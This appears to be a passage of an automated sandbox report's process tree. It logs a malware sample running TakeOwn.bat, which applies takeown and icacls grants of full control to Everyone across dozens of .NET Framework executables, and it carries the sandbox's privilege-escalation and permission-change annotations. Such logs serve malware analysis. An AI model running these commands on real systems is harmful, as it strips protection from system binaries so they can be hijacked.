C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInProcess32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\AddInUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\DataSvcUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\EdmGen.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v3.5\WFServicesReg.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_wp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ComSvcConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /grant "everyone":(f)3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\DataSvcUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\dfsvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework\v4.0.30319\WsatConfig.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\AppLaunch.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_compiler.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regbrowsers.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regiis.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_regsql.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_state.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\aspnet_wp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\CasPol.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dfsvc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\IEExec.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ilasm.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\jsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Ldr64.exe"2⤵
-
